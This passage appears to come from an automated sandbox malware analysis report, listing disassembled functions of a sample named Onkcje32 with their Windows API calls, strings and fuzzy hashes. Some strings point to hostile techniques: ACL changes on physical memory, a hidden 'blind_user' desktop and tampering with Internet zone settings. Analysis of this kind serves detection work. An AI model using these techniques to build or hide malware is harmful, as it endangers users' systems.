                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • 1601, xrefs: 004050D4
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • yes, xrefs: 0040510E
                            • GlobalUserOffline, xrefs: 004050FA
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
